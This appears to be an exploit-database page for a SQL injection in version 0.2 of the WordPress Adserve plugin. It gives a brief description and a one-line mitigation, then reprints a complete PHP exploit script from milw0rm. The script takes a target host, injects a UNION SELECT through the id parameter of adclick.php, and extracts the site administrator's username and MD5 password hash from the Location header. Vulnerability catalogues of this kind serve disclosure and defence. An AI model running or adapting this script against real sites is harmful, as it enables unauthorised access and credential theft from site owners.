header-logo
Suggest Exploit
vendor:
WordPress Adserve plugin
by:
enter_the_dragon
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: WordPress Adserve plugin
Affected Version From: 0.2
Affected Version To: 0.2
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
Unknown

WordPress Adserve plugin v 0.2 Sql Injection Exploit

The WordPress Adserve plugin version 0.2 is vulnerable to a SQL injection attack. The id variable in the adclick.php file is not filtered, allowing an attacker to inject malicious SQL code into the query. If the exploit is successful, the WordPress administrator's login and MD5 hashed password can be retrieved.

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in a SQL query.
Source

Exploit-DB raw data:

<?
# WordPress Adserve plugin v 0.2 Sql Injection Exploit 
#
# Plugin Homepage-http://www.irisco.it/?page_id=40
# 	
# Found by:enter_the_dragon
# 

# Vuln code
#
# -In adclick.php
#
# if (isset($_GET['id'])) {
#    Header("Location: ".iri_AdServe_BannerClick($_GET['id'])
#	
# -In  iri_AdServe_BannerClick function
#   
# 	return $wpdb->get_var("SELECT url FROM $table_name WHERE id=$id;");  
#
#
# 

# Exploit
# 
# id variable isnt filtered so we can inject and check the output in the Location response-header 
# If exploit is succesfull Wordpress administrators login and md5 hashed password is retrieved
#
# 




echo "\n";
echo "-------WordPress Adserve plugin v 0.2 Sql Injection Exploit-------"."\n";
echo "-------------------coded by : enter_the_dragon--------------------"."\n";
echo "------------------------------------------------------------------"."\n";
if ($argc!=3)
{
echo " Usage:	$argv[0] target_host wp_path \n";
echo " target_host:	Your target ex www.target.com \n";
echo " wp_path:	WordPress path ex /blog/ or / if wordpress is installed in the web servers root folder";	     
echo "\n";
exit;
}


$query=$argv[1];
$query.=$argv[2];
$query.="wp-content/plugins/wp-adserve/adclick.php?";
$query.="id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users";

  
if(function_exists(curl_init))
{
  $ch = curl_init("http://$query");
  curl_setopt($ch, CURLOPT_HEADER,true);
  curl_setopt( $ch, CURLOPT_RETURNTRANSFER,true);
  curl_setopt($ch, CURLOPT_TIMEOUT,10);
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)");  
  $html=curl_exec($ch);
  $returncode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
  curl_close($ch);

  if($returncode==302)
     {  
	$pattern="/\|(.*)?\|([a-z0-9]{32})\|/";
        if(preg_match($pattern,$html,$matches))
          {
           $adminusername=$matches[1];
           $adminpass=$matches[2];
	   echo "Admin Login:$adminusername\n" ;
     	   echo "Admin Pass :$adminpass\n";	    
	  }
     }		    
	else 
     {
	exit ("Exploit Failed :( \n");
     }	


}
else
exit("Error:Libcurl isnt installed \n");

?>

# milw0rm.com [2008-01-30]

Navigation

Suggest Exploit

Services By CQR